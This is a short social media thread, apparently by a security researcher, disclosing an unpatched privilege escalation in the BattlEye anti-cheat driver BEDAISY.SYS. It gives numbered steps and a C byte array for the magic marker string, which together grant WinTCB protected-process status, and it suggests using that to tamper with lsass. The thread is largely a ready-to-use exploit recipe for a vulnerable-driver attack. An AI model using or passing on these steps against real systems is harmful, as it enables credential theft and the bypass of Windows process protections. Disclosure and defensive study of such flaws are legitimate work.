Post APPGuMsI29YLmZu5c8 by Rairii@infosec.exchange
Post #APPGuLPtSFFDGDbtiK by Rairii@infosec.exchange
       2022-11-08T21:21:35Z
       
       3 likes, 2 repeats
       
OK, so I'm going to drop a nice #ZeroDay here. At least I think it's 0day, but for bring your own vulnerable driver purposes it's still not blocklisted (despite reporting it months ago, maybe MS only adds drivers that are actively exploited):

BattlEye Anti-Cheat BEDAISY.SYS PPL privesc:

1. Have the string "top BEService&pi" somewhere in your executable PE image. You can just write it to .data if you want.
2. Load bedaisy.
3. Open its \\?\GLOBALROOT\Device\BattlEye device.
4. Write a 9-byte zerofilled buffer to it.
5. Congratulations, you just got WinTCB PPL, go tamper with lsass or whatever.

#AntiCheat #PrivEsc
       
Post #APPGuMsI29YLmZu5c8 by Rairii@infosec.exchange
       2022-11-08T21:22:32Z
       
       0 likes, 0 repeats
       
For my PoC purposes I just did this for step 1 by the way:

    BYTE MagicMarker[] = {
        't', 'o', 'p', ' ',
        'B', 'E', 'S', 'e',
        'r', 'v', 'i', 'c',
        'e', '&', 'p', 'i'
    };
       
Post #APPGuPn5ByAcpIUTPk by Rairii@infosec.exchange
       2022-11-08T21:29:39Z
       
       0 likes, 0 repeats
       
This is the problem with privileged obfuscated code, greets to the people on unknowncheats who publicised a slightly glitchy devirtualised bedaisy.sys, I found the issue in not long at all thanks to that.

Also, the driver does set PPL by using hardcoded EPROCESS offsets (chosen by windows version, I guess different driver versions support different windows versions but for the ones I know about winblue up to 1904x are supported), so YMMV.